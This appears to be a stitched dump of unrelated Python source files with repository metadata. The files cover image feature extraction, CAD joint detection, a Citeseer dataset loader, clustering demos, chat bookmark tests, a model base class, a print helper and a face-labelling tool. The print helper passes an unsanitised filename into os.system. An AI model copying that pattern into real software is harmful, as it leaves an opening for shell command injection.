from keras.models import Model
from src.lib.libic import init, set_opener
from src.lib.model_lib import feature_extractor
if __name__ == '__main__':
parameters = initialize()
total, start = process_image(parameters)
print("Total Features Extracted :", total)
print("Processing Time :", time() - start, "sec")
| 25.704545 | 98 | 0.657825 | import os
from pickle import dump
from time import time
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
from src.lib.libic import init, set_opener
from src.lib.model_lib import feature_extractor
def initialize():
# get program name
caller = os.path.basename(__file__).split('.')[0]
# initiate
paths = init(caller)
# set home path
path_home = paths[0]
os.chdir(path_home)
# set paths
path_dataset, \
path_train_set, \
path_test_set, \
path_extracted_train_features, \
path_extracted_test_features = paths[1]
# Load and create a new model, by removing the last layer (output layer) from the inception v3
model = InceptionV3(weights='imagenet')
model_popped = Model(inputs=model.input, outputs=model.layers[-2].output)
train_images = set_opener(path_train_set)
test_images = set_opener(path_test_set)
all_sets = [train_images, test_images]
outputs = [path_extracted_train_features, path_extracted_test_features]
ret = all_sets, path_dataset, model_popped, outputs
return ret
def process_image(params):
all_sets, path_dataset, model_popped, outputs = params
total_count = 0
# set initial time
start_time = time()
for i, dataset in enumerate(all_sets):
count = 0
features_encoded = dict()
for name in dataset:
count += 1
name = name.strip()
image_path = path_dataset + name
feature_vector = feature_extractor(image_path, model_popped)
image_name = name.split('.')[0]
features_encoded[image_name] = feature_vector
print('> Processing {}/{}'.format(count, len(dataset)) + ' : %s' % name)
total_count += count
# store to file
dump(features_encoded, open(outputs[i], 'wb'))
print("\nFeatures extracted :", len(features_encoded))
print('Features saved to :', outputs[i], end='\n\n')
return total_count, start_time
if __name__ == '__main__':
parameters = initialize()
total, start = process_image(parameters)
print("Total Features Extracted :", total)
print("Processing Time :", time() - start, "sec")
| 1,763 | 0 | 46 |
88d25882c3afabb0780f4d023eb9910b8d7fe33c | 2,426 | py | Python | popupcad/algorithms/getjoints.py | popupcad/popupcad | d3da448260cd5cb9e05417b0a723d7f73ae4e06e | [
"MIT"
] | 19 | 2015-08-01T22:13:39.000Z | 2020-03-07T03:55:46.000Z | popupcad/algorithms/getjoints.py | CadQuery/popupcad | b0c7b406d4b288c7cb375340323bba0252aedbfb | [
"MIT"
] | 106 | 2015-07-23T19:58:01.000Z | 2019-05-14T03:46:08.000Z | popupcad/algorithms/getjoints.py | CadQuery/popupcad | b0c7b406d4b288c7cb375340323bba0252aedbfb | [
"MIT"
] | 9 | 2015-10-04T23:38:41.000Z | 2020-07-16T03:50:34.000Z | # -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
import popupcad
import numpy
| 41.118644 | 107 | 0.650453 | # -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
import popupcad
import numpy
def getjoints(geoms,roundvalue):
from popupcad.geometry.vertex import ShapeVertex
from popupcad.filetypes.genericshapes import GenericLine
tolerance = 10**(-roundvalue)
lines = []
for geom in geoms:
p = geom.exteriorpoints()
lines.extend(zip(p, p[1:] + p[:1]))
for interior in geom.interiorpoints():
lines.extend(zip(interior, interior[1:] + interior[:1]))
l3 = popupcad.algorithms.points.distance_of_lines(lines, [0, 0])
l4 = popupcad.algorithms.points.distance_of_lines(lines, [10 * tolerance, 0])
l5 = popupcad.algorithms.points.distance_of_lines(lines, [10 * tolerance, 10 * tolerance])
l6 = popupcad.algorithms.points.distance_of_lines(lines, [0, 10 * tolerance])
l7 = popupcad.algorithms.points.distance_of_lines(lines, [10 * tolerance, 20 * tolerance])
m = numpy.c_[l3, l4, l5, l6, l7]
m = m.round(roundvalue)
m2 = [tuple(items) for items in m.tolist()]
m3 = list(set(m2))
# jj = numpy.searchsorted(m3,m2)
index_to_unique = [m3.index(item) for item in m2]
indeces_to_orig = [[] for item in m3]
[indeces_to_orig[item].append(ii) for ii, item in enumerate(index_to_unique)]
newsegments = []
for segments in indeces_to_orig:
if len(segments) > 1:
a = [lines[ii] for ii in segments]
vertices = []
[vertices.extend(item) for item in a[1:]]
ordered_vertices = popupcad.algorithms.points.order_vertices(vertices,a[0],tolerance=tolerance)
segs = list(zip(ordered_vertices[:-1], ordered_vertices[1:]))
midpoints = popupcad.algorithms.points.segment_midpoints(segs)
count = [0 for item in midpoints]
for ii in segments:
for jj, point in enumerate(midpoints):
if popupcad.algorithms.points.point_within_line(point,lines[ii],tolerance=tolerance):
count[jj] += 1
newsegments.extend([seg for count_ii, seg in zip(count, segs) if count_ii > 1])
generic_lines = [GenericLine([ShapeVertex(v1), ShapeVertex(v2)], []) for v1, v2 in newsegments]
generic_lines = [item for item in generic_lines if len(item.get_exterior()) == 2]
return generic_lines
| 2,232 | 0 | 23 |
8a78348dbfb4191ec6ca8941fbe66e72e9808301 | 2,750 | py | Python | examples/citeseer/with_rule_weights/citeseer_data_withrules.py | ML-KULeuven/deepstochlog | 4b71d1e306d9cdbbb6237947533f0facfcc62c3a | [
"Apache-2.0"
] | 10 | 2021-12-06T02:07:19.000Z | 2022-03-24T11:40:10.000Z | examples/citeseer/with_structure_learning/citeseer_data_struct.py | ML-KULeuven/deepstochlog | 4b71d1e306d9cdbbb6237947533f0facfcc62c3a | [
"Apache-2.0"
] | null | null | null | examples/citeseer/with_structure_learning/citeseer_data_struct.py | ML-KULeuven/deepstochlog | 4b71d1e306d9cdbbb6237947533f0facfcc62c3a | [
"Apache-2.0"
] | null | null | null | import dgl
import numpy as np
from pathlib import Path
import torch
from deepstochlog.term import Term, List
from deepstochlog.context import ContextualizedTerm, Context
from deepstochlog.dataset import ContextualizedTermDataset
root_path = Path(__file__).parent
dataset = dgl.data.CiteseerGraphDataset()
g = dataset[0]
# get node feature
documents = g.ndata['feat']
# get data split
train_ids = np.where(g.ndata['train_mask'].numpy())[0]
val_ids = np.where(g.ndata['val_mask'].numpy())[0]
test_ids = np.where(g.ndata['test_mask'].numpy())[0]
# get labels
labels = g.ndata['label'].numpy()
edges = []
pretraining_data = documents[train_ids], torch.tensor(labels[train_ids])
citations = []
for eid in range(g.num_edges()):
a, b = g.find_edges(eid)
a, b = a.numpy().tolist()[0], b.numpy().tolist()[0],
edges.append((a,b))
citations.append("cite(%d, %d)." % (a,b))
citations = "\n".join(citations)
train_dataset = CiteseerDataset(split="train", documents=documents, labels=labels)
valid_dataset = CiteseerDataset(split="valid", documents=documents, labels=labels)
test_dataset = CiteseerDataset(split="test", documents=documents, labels=labels)
queries_for_model = train_dataset.queries_for_model + valid_dataset.queries_for_model + test_dataset.queries_for_model
| 27.227723 | 118 | 0.638545 | import dgl
import numpy as np
from pathlib import Path
import torch
from deepstochlog.term import Term, List
from deepstochlog.context import ContextualizedTerm, Context
from deepstochlog.dataset import ContextualizedTermDataset
root_path = Path(__file__).parent
dataset = dgl.data.CiteseerGraphDataset()
g = dataset[0]
# get node feature
documents = g.ndata['feat']
# get data split
train_ids = np.where(g.ndata['train_mask'].numpy())[0]
val_ids = np.where(g.ndata['val_mask'].numpy())[0]
test_ids = np.where(g.ndata['test_mask'].numpy())[0]
# get labels
labels = g.ndata['label'].numpy()
edges = []
pretraining_data = documents[train_ids], torch.tensor(labels[train_ids])
citations = []
for eid in range(g.num_edges()):
a, b = g.find_edges(eid)
a, b = a.numpy().tolist()[0], b.numpy().tolist()[0],
edges.append((a,b))
citations.append("cite(%d, %d)." % (a,b))
citations = "\n".join(citations)
def queries_from_ids(ids, labels, is_test = False):
queries = []
class CiteseerDataset(ContextualizedTermDataset):
def __init__(
self,
split: str,
labels,
documents):
if split == "train":
self.ids = train_ids
elif split =="valid":
self.ids = val_ids
elif split == "test":
self.ids = test_ids
else:
raise Exception("Unkonw split %s" % split)
self.labels = labels
self.is_test = True if split in ("test", "valid") else False
self.documents = documents
self.dataset = []
context = {Term(str(i)): d for i, d in enumerate(self.documents)}
for i in range(6):
context[Term("class" + str(i))] = torch.tensor([i])
context = Context(context)
self.queries_for_model = []
for did in self.ids:
label = Term("class" + str(self.labels[did]))
query = ContextualizedTerm(
context=context,
term=Term("s", label, List(did)))
self.dataset.append(query)
query_model = Term("s", Term("_"), List(did))
self.queries_for_model.append(query_model)
def __len__(self):
return len(self.dataset)
def __getitem__(self, item):
if type(item) is slice:
return (self[i] for i in range(*item.indices(len(self))))
return self.dataset[item]
train_dataset = CiteseerDataset(split="train", documents=documents, labels=labels)
valid_dataset = CiteseerDataset(split="valid", documents=documents, labels=labels)
test_dataset = CiteseerDataset(split="test", documents=documents, labels=labels)
queries_for_model = train_dataset.queries_for_model + valid_dataset.queries_for_model + test_dataset.queries_for_model
| 1,294 | 28 | 126 |
bd45559f8f04e1705dc47d872179c2148a85190e | 1,269 | py | Python | Chapter 09/Chapter_9_Agglomerative.py | bpbpublications/Machine-Learning-for-Beginners | 0f675c3290949c24da55839afb7f7f2dee3e694c | [
"MIT"
] | null | null | null | Chapter 09/Chapter_9_Agglomerative.py | bpbpublications/Machine-Learning-for-Beginners | 0f675c3290949c24da55839afb7f7f2dee3e694c | [
"MIT"
] | null | null | null | Chapter 09/Chapter_9_Agglomerative.py | bpbpublications/Machine-Learning-for-Beginners | 0f675c3290949c24da55839afb7f7f2dee3e694c | [
"MIT"
] | 2 | 2020-10-26T15:53:56.000Z | 2021-11-30T03:55:56.000Z | import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import AgglomerativeClustering
from sklearn.datasets import make_blobs
n_samples = 200
random_state = 10
X, y = make_blobs(n_samples=n_samples, random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering")
plt.show()
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
X_not_balanced = np.vstack((X[y == 0][:500], X[y == 1][:200], X[y == 2][:10]))
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_not_balanced)
plt.scatter(X_not_balanced[:, 0], X_not_balanced[:, 1], c=y_predicted)
plt.title("Blobs having differnt number of elements")
plt.show() | 37.323529 | 95 | 0.742317 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import AgglomerativeClustering
from sklearn.datasets import make_blobs
n_samples = 200
random_state = 10
X, y = make_blobs(n_samples=n_samples, random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering")
plt.show()
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
X_not_balanced = np.vstack((X[y == 0][:500], X[y == 1][:200], X[y == 2][:10]))
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_not_balanced)
plt.scatter(X_not_balanced[:, 0], X_not_balanced[:, 1], c=y_predicted)
plt.title("Blobs having differnt number of elements")
plt.show() | 0 | 0 | 0 |
689c94debfde3113d405c1b7abc4201e58e794c3 | 5,225 | py | Python | test/functional/test_bookmark.py | thenetcircle/dino-service | 90f90e0b21ba920506dc8fc44caf69d5bed9fb6a | [
"MIT"
] | null | null | null | test/functional/test_bookmark.py | thenetcircle/dino-service | 90f90e0b21ba920506dc8fc44caf69d5bed9fb6a | [
"MIT"
] | 4 | 2021-05-24T04:31:34.000Z | 2021-06-28T03:38:56.000Z | test/functional/test_bookmark.py | thenetcircle/dino-service | 90f90e0b21ba920506dc8fc44caf69d5bed9fb6a | [
"MIT"
] | null | null | null | import arrow
from test.base import BaseTest
from test.functional.base_functional import BaseServerRestApi
| 43.907563 | 94 | 0.697225 | import arrow
from test.base import BaseTest
from test.functional.base_functional import BaseServerRestApi
class TestBookmark(BaseServerRestApi):
def test_removing_bookmark_resets_unread_count(self):
self.assert_groups_for_user(0)
group_message = self.send_1v1_message(
user_id=BaseTest.USER_ID,
receiver_id=BaseTest.OTHER_USER_ID
)
group_id = group_message["group_id"]
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(1, stats["unread"])
self.assertEqual(False, stats["bookmark"])
self.bookmark_group(group_id, bookmark=True, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(1, stats["unread"])
self.assertEqual(True, stats["bookmark"])
self.bookmark_group(group_id, bookmark=False, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(0, stats["unread"])
self.assertEqual(False, stats["bookmark"])
def test_removing_bookmark_resets_highlight(self):
self.assert_groups_for_user(0)
group_message = self.send_1v1_message(
user_id=BaseTest.USER_ID,
receiver_id=BaseTest.OTHER_USER_ID
)
group_id = group_message["group_id"]
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(1, stats["unread"])
self.assertEqual(self.long_ago, stats["highlight_time"])
# highlight the group
self.highlight_group_for_user(
group_id,
user_id=BaseTest.OTHER_USER_ID,
highlight_time=arrow.utcnow().float_timestamp
)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(1, stats["unread"])
self.assertEqual(False, stats["bookmark"])
self.assertLess(self.long_ago, stats["highlight_time"])
# add the bookmark
self.bookmark_group(group_id, bookmark=True, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(1, stats["unread"])
self.assertEqual(True, stats["bookmark"])
self.assertLess(self.long_ago, stats["highlight_time"])
receiver_stats = self.groups_for_user(BaseTest.USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(stats["highlight_time"], receiver_stats["receiver_highlight_time"])
self.assertLess(self.long_ago, receiver_stats["receiver_highlight_time"])
# remove the bookmark should reset highlight time and unread count
self.bookmark_group(group_id, bookmark=False, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(0, stats["unread"])
self.assertEqual(False, stats["bookmark"])
self.assertEqual(self.long_ago, stats["highlight_time"])
receiver_stats = self.groups_for_user(BaseTest.USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(stats["highlight_time"], receiver_stats["receiver_highlight_time"])
self.assertEqual(self.long_ago, receiver_stats["receiver_highlight_time"])
def test_removing_bookmark_resets_last_read(self):
self.assert_groups_for_user(0)
group_message = self.send_1v1_message(
user_id=BaseTest.USER_ID,
receiver_id=BaseTest.OTHER_USER_ID
)
group_id = group_message["group_id"]
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(1, stats["unread"])
self.assertEqual(self.long_ago, stats["highlight_time"])
self.histories_for(group_id, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
last_read_time = stats["last_read_time"]
# add the bookmark
self.bookmark_group(group_id, bookmark=True, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(True, stats["bookmark"])
self.assertEqual(last_read_time, stats["last_read_time"])
# send another message
self.send_1v1_message(
user_id=BaseTest.USER_ID,
receiver_id=BaseTest.OTHER_USER_ID
)
# last read time should be same as before
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(True, stats["bookmark"])
self.assertEqual(last_read_time, stats["last_read_time"])
# remove the bookmark should reset last read time
self.bookmark_group(group_id, bookmark=False, user_id=BaseTest.OTHER_USER_ID)
stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
self.assertEqual(False, stats["bookmark"])
self.assertLess(last_read_time, stats["last_read_time"])
| 4,997 | 17 | 103 |
8d3c8515db4ba357929aae6dc7f1097c043238d0 | 3,099 | py | Python | mml/models/__init__.py | feedbackward/mml | d257e0508d75c86c63f01dd6cfe6b48b79e0d4d4 | [
"MIT"
] | null | null | null | mml/models/__init__.py | feedbackward/mml | d257e0508d75c86c63f01dd6cfe6b48b79e0d4d4 | [
"MIT"
] | null | null | null | mml/models/__init__.py | feedbackward/mml | d257e0508d75c86c63f01dd6cfe6b48b79e0d4d4 | [
"MIT"
] | null | null | null | '''Models: base class definitions.'''
###############################################################################
## For reference:
## Throughout this library, we work with the tacit assumption
## that the "parameters" (i.e., values of "paras" dicts) are
## such that paras[key].ndim >= 2, even if they are in essence
## just a single scalar rather than a vector/mtx/array.
## Default general-purpose random parameter initialization function(s).
init_range = 0.05
def random_init(shape, rg, range_low=-init_range, range_high=init_range):
'''
A simple initial randomizer using uniformly generated values.
'''
return rg.uniform(low=range_low,
high=range_high,
size=shape)
## Definition of base model class.
class Model:
'''
Model objects represent collections of parametrized
functions. Each function takes some "inputs" (denoted X),
and is determined by a dictionary of "parameters" (denoted paras).
These parameters are the "state" of the Model object, and
represent a particular choice of candidate from the
hypothesis class implicitly represented by the Model object.
Handy references (property, getter/setter):
https://docs.python.org/3/library/functions.html#property
https://stackoverflow.com/a/15930977
'''
@property
def paras(self):
'''
Get the current parameter dict.
'''
return self._paras
@paras.setter
def paras(self, paras_new):
'''
Set new parameters.
Can do the entire dictionary all at once,
or one can do it one element at a time,
e.g., something like
>> model.paras["key"] = value
can be done as desired.
'''
self._paras = paras_new
def __str__(self):
'''
For printing out the relevant model name.
'''
out = "Model name: {}".format(self.name)
return out
def __call__(self, X=None):
'''
Lets us compute model outputs as model(X).
'''
return self.func(paras=self._paras, X=X)
def func(self, paras=None, X=None):
'''
Execute the model on given inputs.
(implemented in child classes)
'''
raise NotImplementedError
def grad(self, paras=None, X=None):
'''
When applicable, compute the gradient with
respect to the relevant parameters.
(implemented in child classes)
'''
raise NotImplementedError
def hess(self, paras=None, X=None):
'''
When applicable, compute the Hessian with
respect to the relevant parameters.
(implemented in child classes)
'''
raise NotImplementedError
###############################################################################
| 27.184211 | 79 | 0.578251 | '''Models: base class definitions.'''
###############################################################################
## For reference:
## Throughout this library, we work with the tacit assumption
## that the "parameters" (i.e., values of "paras" dicts) are
## such that paras[key].ndim >= 2, even if they are in essence
## just a single scalar rather than a vector/mtx/array.
## Default general-purpose random parameter initialization function(s).
init_range = 0.05
def random_init(shape, rg, range_low=-init_range, range_high=init_range):
'''
A simple initial randomizer using uniformly generated values.
'''
return rg.uniform(low=range_low,
high=range_high,
size=shape)
## Definition of base model class.
class Model:
'''
Model objects represent collections of parametrized
functions. Each function takes some "inputs" (denoted X),
and is determined by a dictionary of "parameters" (denoted paras).
These parameters are the "state" of the Model object, and
represent a particular choice of candidate from the
hypothesis class implicitly represented by the Model object.
Handy references (property, getter/setter):
https://docs.python.org/3/library/functions.html#property
https://stackoverflow.com/a/15930977
'''
def __init__(self, paras_init=None, name=None):
self._paras = paras_init
if name is None:
self.name = self.__class__.__name__
else:
self.name = name
return None
@property
def paras(self):
'''
Get the current parameter dict.
'''
return self._paras
@paras.setter
def paras(self, paras_new):
'''
Set new parameters.
Can do the entire dictionary all at once,
or one can do it one element at a time,
e.g., something like
>> model.paras["key"] = value
can be done as desired.
'''
self._paras = paras_new
def __str__(self):
'''
For printing out the relevant model name.
'''
out = "Model name: {}".format(self.name)
return out
def __call__(self, X=None):
'''
Lets us compute model outputs as model(X).
'''
return self.func(paras=self._paras, X=X)
def func(self, paras=None, X=None):
'''
Execute the model on given inputs.
(implemented in child classes)
'''
raise NotImplementedError
def grad(self, paras=None, X=None):
'''
When applicable, compute the gradient with
respect to the relevant parameters.
(implemented in child classes)
'''
raise NotImplementedError
def hess(self, paras=None, X=None):
'''
When applicable, compute the Hessian with
respect to the relevant parameters.
(implemented in child classes)
'''
raise NotImplementedError
###############################################################################
| 195 | 0 | 31 |
ffa1c51a918aeb4c248717083899dd625abcf68f | 145 | py | Python | print_linux.py | bicubico/neuralprinter | 62abb0149d99e85c011e49d5b3b18cfd685b5057 | [
"MIT"
] | 1 | 2017-12-28T16:49:07.000Z | 2017-12-28T16:49:07.000Z | print_linux.py | bicubico/neuralprinter | 62abb0149d99e85c011e49d5b3b18cfd685b5057 | [
"MIT"
] | null | null | null | print_linux.py | bicubico/neuralprinter | 62abb0149d99e85c011e49d5b3b18cfd685b5057 | [
"MIT"
] | null | null | null | #/usr/bin/python3
import os
| 16.111111 | 47 | 0.662069 | #/usr/bin/python3
import os
def print_image(filename, print_image = False):
if print_image:
os.system('lp ' + filename)
return
| 94 | 0 | 23 |
059066382c7b7496bd4a30a0887999e34e197a7a | 6,840 | py | Python | scripts/elfw-scribbleMe.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 15 | 2020-07-10T08:19:13.000Z | 2022-02-24T08:52:24.000Z | scripts/elfw-scribbleMe.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 7 | 2020-08-11T06:26:54.000Z | 2021-04-23T08:32:21.000Z | scripts/elfw-scribbleMe.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 5 | 2020-08-11T09:09:42.000Z | 2020-11-25T12:02:54.000Z | # This code fills superpixels by scribbling over the image with a given labeled color.
# It requires all jpg faces storaged in the same folder and the .dat super-pixels in the same LFW format.
# R. Redondo, Eurecat 2019 (c).
import numpy as np
import operator
import cv2
import os
import sys
resize = 3
pointer = (-1,-1)
super_scribbles = []
isDrawing = False
radius = 10
category = 1
label_colors = [
( 0, 0, 0),
( 0,255, 0),
( 0, 0,255),
(255,255, 0),
(255, 0, 0),
(255, 0,255)]
label_names = [
"eraser",
"skin",
"hair",
"beard-mustache",
"sunglasses",
"wearable"]
# ---------------------------------------------------------------------------------------
if len(sys.argv) != 4:
print("Usage: $ elfw-scribbleMe <faces_folder> <superpixels_folder> <output_folder>")
exit(0)
faces_folder = sys.argv[1]
sp_folder = sys.argv[2]
output_folder = sys.argv[3]
if not os.path.exists(output_folder):
os.mkdir(output_folder)
# faces_folder = '../Datasets/lfw-deepfunneled/'
# sp_folder = '../Datasets/lfw-deepfunneled-sp/'
# output_folder = '../Datasets/lfw-deepfunneled-sp-overlay/'
for face_file in sorted(os.listdir(faces_folder)):
if not face_file.endswith(".jpg"):
continue
file_name = os.path.splitext(face_file)[0]
super_scribbles_file = os.path.join(output_folder, file_name + '.png')
if os.path.exists(super_scribbles_file):
continue
face = cv2.imread(os.path.join(faces_folder, face_file))
person_name = file_name[:-5]
sp_file = os.path.join(os.path.join(sp_folder, person_name), file_name + '.dat')
if not os.path.exists( sp_file ):
print('\033[1m' + 'Superpixels not found in ' + sp_file + '\033[0m')
exit(0)
print('Editing ' + '\033[1m' + file_name + '\033[0m' + "...")
# Superpixels: watch out, SP do not have univoque numbering
sp = np.fromfile(sp_file, dtype=int, count=-1, sep=' ')
sp = np.array(sp, dtype=np.uint8)
sp = np.reshape(sp, (250, -1))
h, w = sp.shape
# Superpixels bounds
bounds = np.zeros(sp.shape)
for y in range(0, h):
for x in range(0, w):
if y > 0:
if sp[y, x] != sp[y-1, x ]:
bounds[y,x] = 255;
continue
if y < h-1:
if sp[y, x] != sp[y+1, x ]:
bounds[y,x] = 255;
continue
if y < h-1 and x > 0:
if sp[y, x] != sp[y+1, x-1]:
bounds[y,x] = 255;
continue
if y < h-1 and x < w-1:
if sp[y, x] != sp[y+1, x+1]:
bounds[y,x] = 255;
continue
if y > 0 and x > 0:
if sp[y, x] != sp[y-1, x-1]:
bounds[y,x] = 255;
continue
if y > 0 and x < w-1:
if sp[y, x] != sp[y-1, x+1]:
bounds[y,x] = 255;
continue
if x > 0:
if sp[y, x] != sp[y , x-1]:
bounds[y,x] = 255;
continue
if x < w-1:
if sp[y, x] != sp[y , x+1]:
bounds[y,x] = 255;
continue
# Erode
kernel = np.ones((2,2),np.uint8)
bounds = cv2.erode(bounds, kernel, iterations = 1)
# Boundaries visualization
b,g,r = cv2.split(face)
r[bounds > 0] = r[bounds > 0] * 0.2 + 255 * 0.8;
bounds = cv2.merge((b,g,r))
## SP re-indexing: there could be several superpixels for each SP index label
index = 0
sp_reindex = np.zeros(sp.shape, dtype='uint32')
for s in range(0,np.amax(sp)+1):
mask = np.zeros(sp.shape, dtype='uint8')
mask[sp == s] = 255
_, components = cv2.connectedComponents(mask, connectivity=4)
if np.amax(components):
for c in range(1,np.amax(components)+1):
index = index + 1
sp_reindex[components == c] = index
# Scribbles
scribbles = np.zeros(face.shape)
super_scribbles = scribbles.copy()
face_canvas = face.copy()
# Mouse events callback
cv2.namedWindow(file_name)
cv2.setMouseCallback(file_name, onClick)
# Defaults
radius = 2
category = 1
while True:
# Key handlers
k = cv2.waitKey(1) & 0xFF
if k >= 48 and k <= 53:
category = k - 48
elif k == ord('e'):
category = 0
elif k == ord('q'):
radius = min(radius + 2, 16)
elif k == ord('a'):
radius = max(radius - 2, 2)
elif k == 32:
if radius < 10:
radius = 16
else:
radius = 2
elif k == 13:
break
elif k == 27:
exit(0)
# Compositing
alpha = 0.12
face_canvas = face.copy()
face_canvas[super_scribbles != 0] = face_canvas[super_scribbles != 0] * alpha + super_scribbles[super_scribbles != 0] * (1-alpha)
alpha = 0.12
bounds_canvas = bounds.copy()
bounds_canvas[scribbles != 0] = bounds_canvas[scribbles != 0] * alpha + scribbles[scribbles != 0] * (1-alpha)
alpha = 0.5
overlay = bounds_canvas.copy()
cv2.circle(overlay, pointer, radius, label_colors[category], -1)
bounds_canvas = cv2.addWeighted(bounds_canvas, alpha, overlay, 1 - alpha, 0)
vis = np.concatenate((bounds_canvas, face_canvas), axis=1)
vis = cv2.resize(vis, (vis.shape[1] * resize, vis.shape[0] * resize), cv2.INTER_NEAREST)
# Info
font_size = 0.6
font_thickness = 2
hstep = 25
info = "Label (0-5,e): "
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = " " + label_names[category]
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, label_colors[category], font_thickness)
info = "Stroke (q-a,space): " + str(radius)
cv2.putText(vis, info, (10, hstep * 2), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Save and give me more (enter)"
cv2.putText(vis, info, (10, hstep * 3), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Exit (esc)"
cv2.putText(vis, info, (10, hstep * 4), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
cv2.imshow(file_name, vis)
cv2.destroyWindow(file_name)
# Save output
cv2.imwrite(super_scribbles_file, super_scribbles)
print("Labels saved in " + super_scribbles_file)
cv2.destroyAllWindows() | 26.614786 | 131 | 0.629094 | # This code fills superpixels by scribbling over the image with a given labeled color.
# It requires all jpg faces storaged in the same folder and the .dat super-pixels in the same LFW format.
# R. Redondo, Eurecat 2019 (c).
import numpy as np
import operator
import cv2
import os
import sys
resize = 3
pointer = (-1,-1)
super_scribbles = []
isDrawing = False
radius = 10
category = 1
label_colors = [
( 0, 0, 0),
( 0,255, 0),
( 0, 0,255),
(255,255, 0),
(255, 0, 0),
(255, 0,255)]
label_names = [
"eraser",
"skin",
"hair",
"beard-mustache",
"sunglasses",
"wearable"]
def onClick(event,x,y,flags,param):
global isDrawing, mode, radius, category, super_scribbles, pointer
pointer = (int(x/resize), int(y/resize))
if event == cv2.EVENT_LBUTTONDOWN:
isDrawing = True
elif event == cv2.EVENT_LBUTTONUP:
isDrawing = False
# Scribbles to SP elections
super_scribbles = np.zeros(scribbles.shape)
sp_votes = {}
sp_areas = np.zeros(index+1)
h, w = sp_reindex.shape
for y in range(0, h):
for x in range(0, w):
s = sp_reindex[y, x]
sp_areas[s] = sp_areas[s] + 1
vote_rgb = scribbles[y,x]
if vote_rgb.any():
if s not in sp_votes:
sp_votes[s] = {}
vote_rgb = tuple(vote_rgb)
if vote_rgb in sp_votes[s]:
sp_votes[s][vote_rgb] = sp_votes[s][vote_rgb] + 1
else:
sp_votes[s][vote_rgb] = 1
for s in sp_votes.keys():
winner, votes = max(sp_votes[s].items(), key=operator.itemgetter(1))
super_scribbles[sp_reindex == s] = np.array(winner)# (0,255,0)
if isDrawing and (event == cv2.EVENT_LBUTTONDOWN or event == cv2.EVENT_MOUSEMOVE):
cv2.circle(scribbles, pointer, radius, label_colors[category], -1)
# ---------------------------------------------------------------------------------------
if len(sys.argv) != 4:
print("Usage: $ elfw-scribbleMe <faces_folder> <superpixels_folder> <output_folder>")
exit(0)
